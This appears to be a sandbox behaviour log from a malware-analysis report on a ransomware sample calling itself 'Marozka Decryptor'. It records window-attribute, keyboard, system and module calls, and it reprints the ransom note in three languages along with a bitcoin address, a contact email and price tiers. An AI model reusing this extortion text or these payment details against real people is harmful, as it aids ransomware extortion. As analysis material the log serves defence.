Set Attribute $300 class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -4, new_long = 1876339648 True 1
Fn
Set Attribute $300 class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -4, new_long = 88374934 True 1
Fn
Set Attribute $300 class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -12, new_long = 66068 False 1
Fn
Set Attribute Cost of class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -4, new_long = 1876339648 True 1
Fn
Set Attribute Cost of class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -4, new_long = 88375254 True 1
Fn
Set Attribute Cost of class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -12, new_long = 66070 False 1
Fn
Set Attribute - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -4, new_long = 1952448832 True 1
Fn
Set Attribute - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -4, new_long = 88375054 True 1
Fn
Set Attribute - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -12, new_long = 66072 False 1
Fn
Set Attribute first 24 hours class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -4, new_long = 1876339648 True 1
Fn
Set Attribute first 24 hours class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -4, new_long = 88375574 True 1
Fn
Set Attribute first 24 hours class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -12, new_long = 66074 False 1
Fn
Set Attribute $150 class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -4, new_long = 1876339648 True 1
Fn
Set Attribute $150 class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -4, new_long = 88375654 True 1
Fn
Set Attribute $150 class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -12, new_long = 66076 False 1
Fn
Set Attribute Cost of class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -4, new_long = 1876339648 True 1
Fn
Set Attribute Cost of class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -4, new_long = 88375614 True 1
Fn
Set Attribute Cost of class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -12, new_long = 66078 False 1
Fn
Set Attribute - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -4, new_long = 1952448832 True 1
Fn
Set Attribute - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -4, new_long = 88375814 True 1
Fn
Set Attribute - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -12, new_long = 66080 False 1
Fn
Set Attribute Send dollars to this address bitcoins class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -4, new_long = 1876339648 True 1
Fn
Set Attribute Send dollars to this address bitcoins class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -4, new_long = 88375854 True 1
Fn
Set Attribute Send dollars to this address bitcoins class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -12, new_long = 66082 False 1
Fn
Set Attribute - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -4, new_long = 1952448832 True 1
Fn
Set Attribute - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -4, new_long = 88375414 True 1
Fn
Set Attribute - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -12, new_long = 66084 False 1
Fn
Set Attribute 1Cm6VtFJmJGVLiaUh5WVKWau7QhJhtkj3G class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, index = -4, new_long = 1876218976 True 1
Fn
Set Attribute 1Cm6VtFJmJGVLiaUh5WVKWau7QhJhtkj3G class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, index = -4, new_long = 88375134 True 1
Fn
Set Attribute 1Cm6VtFJmJGVLiaUh5WVKWau7QhJhtkj3G class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, index = -12, new_long = 66086 False 1
Fn
Set Attribute Copy BTC class_name = WindowsForms10.BUTTON.app.0.141b42a_r11_ad1, index = -4, new_long = 1876224000 True 1
Fn
Set Attribute Copy BTC class_name = WindowsForms10.BUTTON.app.0.141b42a_r11_ad1, index = -4, new_long = 88375494 True 1
Fn
Set Attribute Copy BTC class_name = WindowsForms10.BUTTON.app.0.141b42a_r11_ad1, index = -12, new_long = 66088 False 1
Fn
Set Attribute Доброго времени суток!!! Все файлы на вашем компьютере зашифрованы. Расшифровать фалы возможно только при нашей помощи!!! Вам необходимо в течение 48 часов произвести оплату для расшифровки ваших файлов в соответствие с тарифом вашей страны. Тарифы указанны в окошке с лева!!! И обратиться к нам после оплаты за вашим индивидуальным ключем расшифровки по контактам ниже: Если этого не произойдет то через 72 часа все ваши файлы будут утеряны. К тому же мы используем ваш компьютер в своих не законных действиях. А по сколько ваш компьютер куплен вами и в соответствие с законодательством вашей страны является вашей собственностью. И нести уголовную ответственность за наши действия будете вы))) Поспешите произвести оплату class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, index = -4, new_long = 1876218976 True 1
Fn
Set Attribute Доброго времени суток!!! Все файлы на вашем компьютере зашифрованы. Расшифровать фалы возможно только при нашей помощи!!! Вам необходимо в течение 48 часов произвести оплату для расшифровки ваших файлов в соответствие с тарифом вашей страны. Тарифы указанны в окошке с лева!!! И обратиться к нам после оплаты за вашим индивидуальным ключем расшифровки по контактам ниже: Если этого не произойдет то через 72 часа все ваши файлы будут утеряны. К тому же мы используем ваш компьютер в своих не законных действиях. А по сколько ваш компьютер куплен вами и в соответствие с законодательством вашей страны является вашей собственностью. И нести уголовную ответственность за наши действия будете вы))) Поспешите произвести оплату class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, index = -4, new_long = 88375094 True 1
Fn
Set Attribute Доброго времени суток!!! Все файлы на вашем компьютере зашифрованы. Расшифровать фалы возможно только при нашей помощи!!! Вам необходимо в течение 48 часов произвести оплату для расшифровки ваших файлов в соответствие с тарифом вашей страны. Тарифы указанны в окошке с лева!!! И обратиться к нам после оплаты за вашим индивидуальным ключем расшифровки по контактам ниже: Если этого не произойдет то через 72 часа все ваши файлы будут утеряны. К тому же мы используем ваш компьютер в своих не законных действиях. А по сколько ваш компьютер куплен вами и в соответствие с законодательством вашей страны является вашей собственностью. И нести уголовную ответственность за наши действия будете вы))) Поспешите произвести оплату class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, index = -12, new_long = 66090 False 1
Fn
Set Attribute - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -4, new_long = 1952448832 True 1
Fn
Set Attribute - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -4, new_long = 88375694 True 1
Fn
Set Attribute - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -12, new_long = 66092 False 1
Fn
Set Attribute Sorry! Your files have been encrypted! class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -4, new_long = 1876339648 True 1
Fn
Set Attribute Sorry! Your files have been encrypted! class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -4, new_long = 88375734 True 1
Fn
Set Attribute Sorry! Your files have been encrypted! class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -12, new_long = 66094 False 1
Fn
Set Attribute English class_name = WindowsForms10.COMBOBOX.app.0.141b42a_r11_ad1, index = -4, new_long = 1876096512 True 1
Fn
Set Attribute English class_name = WindowsForms10.COMBOBOX.app.0.141b42a_r11_ad1, index = -4, new_long = 88374974 True 1
Fn
Set Attribute English class_name = WindowsForms10.COMBOBOX.app.0.141b42a_r11_ad1, index = -12, new_long = 66096 False 1
Fn
Set Attribute - index = -4, new_long = 88375294 True 1
Fn
Set Attribute 00:00:00 class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -4, new_long = 1876339648 True 1
Fn
Set Attribute 00:00:00 class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -4, new_long = 88375374 True 1
Fn
Set Attribute 00:00:00 class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -12, new_long = 66102 False 1
Fn
Set Attribute Name class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -4, new_long = 1876339648 True 1
Fn
Set Attribute Name class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -4, new_long = 88377638 True 1
Fn
Set Attribute Name class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -12, new_long = 66104 False 1
Fn
Set Attribute Helloy - class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -4, new_long = 1876339648 True 1
Fn
Set Attribute Helloy - class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -4, new_long = 88377038 True 1
Fn
Set Attribute Helloy - class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -12, new_long = 66106 False 1
Fn
Set Attribute - index = -8, new_long = 0 True 1
Fn
Set Attribute WindowsFormsParkingWindow class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -4, new_long = 1952448832 True 1
Fn
Set Attribute WindowsFormsParkingWindow class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -4, new_long = 88377358 True 1
Fn
Set Attribute Marozka Decryptor class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -4, new_long = 1952448832 True 1
Fn
Set Attribute Marozka Decryptor class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -4, new_long = 88377198 True 1
Fn
Set Attribute - class_name = WindowsForms10.Window.0.app.0.141b42a_r11_ad1, index = -4, new_long = 1952448832 True 1
Fn
Set Attribute - class_name = WindowsForms10.Window.0.app.0.141b42a_r11_ad1, index = -4, new_long = 88376998 True 1
Fn
Set Attribute Marozka Decryptor class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -8, new_long = 66112 False 1
Fn
Set Attribute Marozka Decryptor class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -8, new_long = 66112 True 1
Fn
Set Attribute Marozka Decryptor class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -16, new_long = 302055424 True 1
Fn
Set Attribute Marozka Decryptor class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -20, new_long = 65664 True 1
Fn
Set Attribute - index = -4, new_long = 1952448832 True 7
Fn
Set Attribute knyaz@cock.li class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, index = -4, new_long = 1876218976 True 1
Fn
Set Attribute - index = -4, new_long = 1876339648 True 10
Fn
Set Attribute - index = -4, new_long = 1876218976 True 4
Fn
Set Attribute Good day!!! All files on your computer are encrypted. Decoding files is only possible with our help !!! You need to pay within 48 hours to decrypt your files in accordance with the tariff of your country. Tariffs are indicated in the window from the left !!! And contact us after paying for your individual decryption key by contact below: If this does not happen then after 72 hours all your files will be lost. In addition, we use your computer in their illegal actions. And how much your computer is bought by you and in accordance with your legislation country is your property. And you will be criminally responsible for our actions))) Hurry to pay class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, index = -4, new_long = 1876218976 True 1
Fn
Set Attribute Buona giornata! Tutti i file sul tuo computer sono crittografati. La decodifica dei file è possibile solo con il nostro aiuto !!! Devi pagare entro 48 ore per decifrare il tuo file in conformità con la tariffa del tuo paese. Le tariffe sono indicate nella finestra da sinistra !!! E contattaci dopo aver pagato la tua chiave di decodifica individuale per contatto di seguito: Se ciò non accade, dopo 72 ore tutti i file andranno persi. Inoltre, usiamo il tuo computer nelle loro azioni illegali. E quanto il tuo computer è stato acquistato da te e in conformità con la tua legislazione il paese è di tua proprietà E sarai criminalmente responsabile delle nostre azioni))) Sbrigati a pagare class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, index = -4, new_long = 1876218976 True 1
Fn
Set Attribute - index = -4, new_long = 1876224000 True 2
Fn
Set Attribute Next 24 hours class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -4, new_long = 1876339648 True 1
Fn
Set Attribute $300 class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -4, new_long = 1876339648 True 1
Fn
Set Attribute Cost of class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -4, new_long = 1876339648 True 1
Fn
Set Attribute Доброго времени суток!!! Все файлы на вашем компьютере зашифрованы. Расшифровать фалы возможно только при нашей помощи!!! Вам необходимо в течение 48 часов произвести оплату для расшифровки ваших файлов в соответствие с тарифом вашей страны. Тарифы указанны в окошке с лева!!! И обратиться к нам после оплаты за вашим индивидуальным ключем расшифровки по контактам ниже: Если этого не произойдет то через 72 часа все ваши файлы будут утеряны. К тому же мы используем ваш компьютер в своих не законных действиях. А по сколько ваш компьютер куплен вами и в соответствие с законодательством вашей страны является вашей собственностью. И нести уголовную ответственность за наши действия будете вы))) Поспешите произвести оплату class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, index = -4, new_long = 1876218976 True 1
Fn
Set Attribute - index = -4, new_long = 1876096512 True 1
Fn
Set Attribute - index = -8, new_long = 66110 True 1
Fn
Set Attribute Key class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -4, new_long = 1952448832 True 1
Fn
Set Attribute - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -4, new_long = 1952448832 True 1
Fn
Set Attribute 100% decryption guarantee class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -4, new_long = 1876339648 True 1
Fn
Set Attribute - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -4, new_long = 1952448832 True 1
Fn
Set Attribute - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -4, new_long = 1952448832 True 1
Fn
Set Attribute - class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, index = -4, new_long = 1876218976 True 1
Fn
Set Attribute Password: class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -4, new_long = 1876339648 True 1
Fn
Set Attribute Decrypt My Files class_name = WindowsForms10.BUTTON.app.0.141b42a_r11_ad1, index = -4, new_long = 1876224000 True 1
Fn
Set Attribute Key class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -4, new_long = 1952448832 True 1
Fn
Set Attribute 100% decryption guarantee class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -4, new_long = 1876339648 True 1
Fn
Set Attribute - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -4, new_long = 1952448832 True 1
Fn
Set Attribute - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -4, new_long = 1952448832 True 1
Fn
Set Attribute - class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, index = -4, new_long = 1876218976 True 1
Fn
Set Attribute Password: class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -4, new_long = 1876339648 True 1
Fn
Set Attribute Decrypt My Files class_name = WindowsForms10.BUTTON.app.0.141b42a_r11_ad1, index = -4, new_long = 1876224000 True 1
Fn
Set Attribute Key class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -4, new_long = 1952448832 True 1
Fn
Set Attribute 100% decryption guarantee class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -4, new_long = 1876339648 True 1
Fn
Set Attribute - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -4, new_long = 1952448832 True 1
Fn
Set Attribute - class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, index = -4, new_long = 1876218976 True 1
Fn
Set Attribute Password: class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -4, new_long = 1876339648 True 1
Fn
Set Attribute Decrypt My Files class_name = WindowsForms10.BUTTON.app.0.141b42a_r11_ad1, index = -4, new_long = 1876224000 True 1
Fn
Set Attribute Key class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -4, new_long = 1952448832 True 1
Fn
Set Attribute 100% decryption guarantee class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -4, new_long = 1876339648 True 1
Fn
Set Attribute - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -4, new_long = 1952448832 True 1
Fn
Set Attribute - class_name = WindowsForms10.Window.8.app.0.141b42a_r11_ad1, index = -4, new_long = 1952448832 True 1
Fn
Set Attribute - class_name = WindowsForms10.EDIT.app.0.141b42a_r11_ad1, index = -4, new_long = 1876218976 True 1
Fn
Set Attribute Password: class_name = WindowsForms10.STATIC.app.0.141b42a_r11_ad1, index = -4, new_long = 1876339648 True 1
Fn
Set Attribute Decrypt My Files class_name = WindowsForms10.BUTTON.app.0.141b42a_r11_ad1, index = -4, new_long = 1876224000 True 1
Fn
Keyboard (287)
»
Operation Additional Information Success Count Logfile
Get Info type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721 True 12
Fn
Read virtual_key_code = VK_RBUTTON, result_out = 0 True 51
Fn
Read virtual_key_code = VK_MBUTTON, result_out = 0 True 51
Fn
Read virtual_key_code = VK_XBUTTON1, result_out = 0 True 51
Fn
Read virtual_key_code = VK_XBUTTON2, result_out = 0 True 51
Fn
Read virtual_key_code = VK_LBUTTON, result_out = 0 True 16
Fn
Read virtual_key_code = VK_LBUTTON, result_out = -127 True 14
Fn
Read virtual_key_code = VK_LBUTTON, result_out = 1 True 11
Fn
Read virtual_key_code = VK_LBUTTON, result_out = -128 True 9
Fn
Read virtual_key_code = VK_SHIFT, result_out = 0 True 7
Fn
Read virtual_key_code = VK_CONTROL, result_out = 0 True 7
Fn
Read virtual_key_code = VK_MENU, result_out = 0 True 7
Fn
System (513)
»
Operation Additional Information Success Count Logfile
Get window text window_text = 1696096 True 1
Fn
Get window text window_text = 1695396 False 5
Fn
Get window text window_text = 1695152 True 1
Fn
Get window text window_text = 1697844 False 1
Fn
Get window text window_text = 1698040 True 9
Fn
Get window text window_text = 1696608 True 1
Fn
Get window text window_text = 1693148 False 2
Fn
Get window text window_text = 1696404 True 2
Fn
Get window text window_text = 1696580 True 2
Fn
Get window text window_text = 1694752 True 1
Fn
Get window text window_text = 1692924 False 2
Fn
Get window text window_text = 1696676 True 1
Fn
Get window text window_text = 1696740 False 5
Fn
Get window text window_text = 1695148 False 8
Fn
Get window text window_text = 1695052 False 16
Fn
Get window text window_text = 1696588 False 13
Fn
Get window text window_text = 1694996 False 4
Fn
Get window text window_text = 1694900 False 8
Fn
Get window text window_text = 1696556 False 1
Fn
Get window text window_text = 1693412 False 3
Fn
Get window text window_text = 1693316 False 8
Fn
Get window text window_text = 1696340 False 1
Fn
Get window text window_text = 16169304 False 1
Fn
Get window text window_text = 1695020 False 6
Fn
Get window text window_text = 1694924 False 5
Fn
Get window text window_text = 1694956 False 4
Fn
Get window text window_text = 1694860 False 7
Fn
Get window text window_text = 16162808 True 1
Fn
Get window text window_text = 1695888 True 1
Fn
Get window text window_text = 16164296 False 1
Fn
Get window text window_text = 1696460 False 3
Fn
Get window text window_text = 1695044 False 1
Fn
Get window text window_text = 1696212 False 3
Fn
Get window text window_text = 16173376 False 1
Fn
Get window text window_text = 1696676 False 1
Fn
Get window text window_text = 1697960 True 1
Fn
Get window text window_text = 1697956 True 1
Fn
Get window text window_text = 1697732 True 1
Fn
Get window text window_text = 1696512 True 1
Fn
Get window text window_text = 1697792 False 1
Fn
Get window text window_text = 1698000 False 2
Fn
Get window text window_text = 1697940 False 3
Fn
Get window text window_text = 1697716 False 5
Fn
Get window text window_text = 1696124 False 8
Fn
Get window text window_text = 1696028 False 15
Fn
Get window text window_text = 1695508 False 1
Fn
Get window text window_text = 1695412 False 2
Fn
Get window text window_text = 1697900 True 68
Fn
Get window text window_text = 1697964 False 20
Fn
Get window text window_text = 1695516 False 1
Fn
Get window text window_text = 1695420 False 2
Fn
Get window text window_text = 1697892 True 4
Fn
Get window text window_text = 1697908 True 7
Fn
Get window text window_text = 1697904 True 9
Fn
Get window text window_text = 1697888 True 4
Fn
Get window text window_text = 1697840 True 6
Fn
Get window text window_text = 1697976 False 14
Fn
Get window text window_text = 1695380 False 1
Fn
Get window text window_text = 1696644 True 1
Fn
Get window text window_text = 1696600 False 1
Fn
Get window text window_text = 1696728 True 1
Fn
Get window text window_text = 1697836 False 4
Fn
Get window text window_text = 1697688 True 10
Fn
Get window text window_text = 1697644 False 10
Fn
Get window text window_text = 1697800 False 8
Fn
Get window text window_text = 1697928 True 12
Fn
Get window text window_text = 1697868 True 9
Fn
Get window text window_text = 1696204 False 2
Fn
Get window text window_text = 1696108 False 4
Fn
Get window text window_text = 1698300 False 17
Fn
Get window text window_text = 1698460 True 20
Fn
Get window text window_text = 1698456 True 20
Fn
Get window text window_text = 1698236 True 15
Fn
Get window text window_text = 1695236 False 8
Fn
Get window text window_text = 1697764 False 3
Fn
Get window text window_text = 1696924 False 9
Fn
Get window text window_text = 1696888 True 9
Fn
Get window text window_text = 1695140 False 3
Fn
Get window text window_text = 1695332 False 3
Fn
Get window text window_text = 1696892 False 6
Fn
Get window text window_text = 1696832 True 1
Fn
Get window text window_text = 1695116 False 2
Fn
Get window text window_text = 1695108 False 4
Fn
Get window text window_text = 1695012 False 6
Fn
Get Computer Name result_out = NQDPDE True 1
Fn
Get Cursor x_out = 819, y_out = 301 True 2
Fn
Sleep duration = 0 milliseconds (0.000 seconds) True 4
Fn
Sleep duration = 100 milliseconds (0.100 seconds) True 1
Fn
Sleep duration = 1000 milliseconds (1.000 seconds) True 1
Fn
Get Time type = System Time, time = 2019-05-24 16:57:39 (UTC) True 1
Fn
Get Time type = Ticks, time = 223312 True 1
Fn
Get Time type = Performance Ctr, time = 22334865620 True 1
Fn
Get Time type = System Time, time = 2019-05-24 16:57:40 (UTC) True 1
Fn
Get Time type = Ticks, time = 224578 True 1
Fn
Get Time type = Performance Ctr, time = 22461449032 True 1
Fn
Get Info type = SYSTEM_MODULE_INFORMATION False 1
Fn
Get Info type = SYSTEM_MODULE_INFORMATION True 1
Fn
Get Info type = Hardware Information True 1
Fn
Environment (2)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Data
Debug (4)
»
Operation Process Additional Information Success Count Logfile
Check for Presence c:\fd1hvy\hermes-decrypter-new.exe - True 1
Fn
Check for Presence c:\fd1hvy\hermes-decrypter-new.exe - True 1
Fn
Check for Presence c:\fd1hvy\hermes-decrypter-new.exe - False 1
Fn
Hide c:\fd1hvy\hermes-decrypter-new.exe - True 1
Fn
Process #4: hermes-decrypter-new.exe
210 0
»
Information Value
ID #4
File Name c:\fd1hvy\hermes-decrypter-new.exe
Command Line "C:\FD1HVy\Hermes-decrypter-new.exe"
Initial Working Directory C:\WINDOWS\system32\
Monitor Start Time: 00:04:24, Reason: Autostart
Unmonitor End Time: 00:04:38, Reason: Terminated by Timeout
Monitor Duration 00:00:14
OS Process Information
»
Information Value
PID 0xe08
Parent PID 0x99c (c:\windows\explorer.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level Medium
Username NQDPDE\FD1HVy
Enabled Privileges SeChangeNotifyPrivilege, SeCreateGlobalPrivilege
Thread IDs
0x E0C
0x E24
0x E2C
0x E30
Host Behavior
File (8)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll type = file_attributes True 1
Fn
Open \??\C:\FD1HVy\Hermes-decrypter-new.exe desired_access = FILE_READ_ATTRIBUTES, SYNCHRONIZE, GENERIC_READ, open_options = FILE_SYNCHRONOUS_IO_NONALERT, FILE_NON_DIRECTORY_FILE, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_OUTPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 2
Fn
Registry (1)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\AppContext - False 1
Fn
Module (170)
»
Operation Module Additional Information Success Count Logfile
Load mscoree.dll base_address = 0x73b90000 True 1
Fn
Load mscorjit.dll base_address = 0x0 False 1
Fn
Load clrjit.dll base_address = 0x71ea0000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x77190000 True 26
Fn
Get Handle c:\windows\syswow64\ntdll.dll base_address = 0x77260000 True 16
Fn
Get Handle c:\windows\syswow64\ole32.dll base_address = 0x74ab0000 True 1
Fn
Get Handle c:\windows\syswow64\oleaut32.dll base_address = 0x74e00000 True 1
Fn
Get Handle c:\windows\syswow64\wtsapi32.dll base_address = 0x73c70000 True 1
Fn
Get Handle c:\windows\syswow64\user32.dll base_address = 0x765c0000 True 2
Fn
Get Handle c:\windows\syswow64\kernelbase.dll base_address = 0x76850000 True 1
Fn
Get Handle c:\fd1hvy\hermes-decrypter-new.exe base_address = 0x400000 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\FD1HVy\Hermes-decrypter-new.exe, size = 254 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\FD1HVy\Hermes-decrypter-new.exe, size = 260 True 2
Fn
Get Filename c:\fd1hvy\hermes-decrypter-new.exe process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\FD1HVy\Hermes-decrypter-new.exe, size = 2048 True 2
Fn
Get Filename c:\windows\syswow64\ntdll.dll process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\SYSTEM32\ntdll.dll, size = 2048 True 1
Fn
Get Filename c:\windows\syswow64\kernel32.dll process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\KERNEL32.DLL, size = 2048 True 1
Fn
Get Filename c:\windows\syswow64\kernelbase.dll process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\KERNELBASE.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\SYSTEM32\apphelp.dll, size = 2048 True 1
Fn
Get Filename c:\windows\syswow64\ole32.dll process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\ole32.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\combase.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\ucrtbase.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\RPCRT4.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\SspiCli.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\CRYPTBASE.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\bcryptPrimitives.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\sechost.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\GDI32.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\gdi32full.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\msvcp_win.dll, size = 2048 True 1
Fn
Get Filename c:\windows\syswow64\user32.dll process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\USER32.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\win32u.dll, size = 2048 True 1
Fn
Get Filename c:\windows\syswow64\oleaut32.dll process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\OLEAUT32.dll, size = 2048 True 1
Fn
Get Filename c:\windows\syswow64\wtsapi32.dll process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\SYSTEM32\WTSAPI32.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\msvcrt.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\IMM32.DLL, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\kernel.appcore.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\system32\uxtheme.dll, size = 2048 True 1
Fn
Get Filename c:\windows\syswow64\mscoree.dll process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\SYSTEM32\mscoree.dll, size = 2048 True 1
Fn
Get Filename - process_name = c:\fd1hvy\hermes-decrypter-new.exe, file_name_orig = C:\WINDOWS\System32\ADVAPI32.dll, size = 2048 True 1
Fn
